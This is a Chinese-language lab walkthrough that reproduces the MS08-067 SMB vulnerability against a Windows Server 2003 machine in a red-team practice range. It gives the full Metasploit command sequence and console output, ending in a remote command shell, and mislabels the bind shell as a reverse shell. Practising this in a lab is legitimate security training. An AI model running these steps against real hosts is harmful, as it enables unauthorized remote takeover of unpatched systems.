环境
- 红日靶场:ATT&CK红队评估01 - win2k3 192.168.52.141
- 攻击机:32位 kali 172.24.4.7
- 已做内网流量转发
MS08-067复现过程
漏洞介绍
MS08-067是一个在2008年10月发现的安全漏洞,影响Microsoft Windows操作系统。这个漏洞允许攻击者通过特制的RPC(远程过程调用)请求,在受影响的系统上远程执行任意代码。
该漏洞主要影响Windows Server 2003和Windows XP等操作系统,尤其是那些默认开放SMB服务端口445的系统。攻击者可以利用Metasploit等工具来利用这一漏洞进行远程代码执行。
执行命令:msfconsole
┌──(kali㉿kali)-[~]
└─$ msfconsole
Metasploit tip: Open an interactive Ruby terminal with irb
. .
.
dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o
' dB' BBP
dB'dB'dB' dBBP dBP dBP BB
dB'dB'dB' dBP dBP dBP BB
dB'dB'dB' dBBBBP dBP dBBBBBBB
dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP
. . dB' dBP dB'.BP
| dBP dBBBB' dBP dB'.BP dBP dBP
--o-- dBP dBP dBP dB'.BP dBP dBP
| dBBBBP dBP dBBBBP dBBBBP dBP dBP
.
.
o To boldly go where no
shell has gone before
=[ metasploit v6.4.9-dev ]
+ -- --=[ 2420 exploits - 1248 auxiliary - 423 post ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
执行命令:search ms08-067
msf6 > search ms08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
执行命令:use 0 或 use exploit/windows/smb/ms08_067_netapi
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) >
执行命令:set rhost 192.168.52.141
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.52.141
rhosts => 192.168.52.141
执行命令:set payload generic/shell_bind_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
执行命令:show options
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.52.141 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics
/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (generic/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.52.141 no The target address
Exploit target:
Id Name
-- ----
0 Automatic Targeting
View the full module info with the info, or info -d command.
执行命令:exploit 或 run
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
[*] 192.168.52.141:445 - Automatically detecting the target...
[*] 192.168.52.141:445 - Fingerprint: Windows 2003 - - lang:Unknown
[*] 192.168.52.141:445 - Selected Target: Windows 2003 SP0 Universal
[*] 192.168.52.141:445 - Attempting to trigger the vulnerability...
[*] Started bind TCP handler against 192.168.52.141:4444
[*] Command shell session 1 opened (172.24.4.7:36497 -> 192.168.52.141:4444) at 2024-06-09 08:52:22 -0400
Shell Banner:
Microsoft Windows [Version 5.2.3790]
-----
C:\WINDOWS\system32>
反弹shell成功
PS:仅学习,有什么不对请各位大大斧正
请确保在使用这些技术时,您有权这么做,并且您的行为符合法律法规和道德准则。这些信息仅供教育和研究目的使用。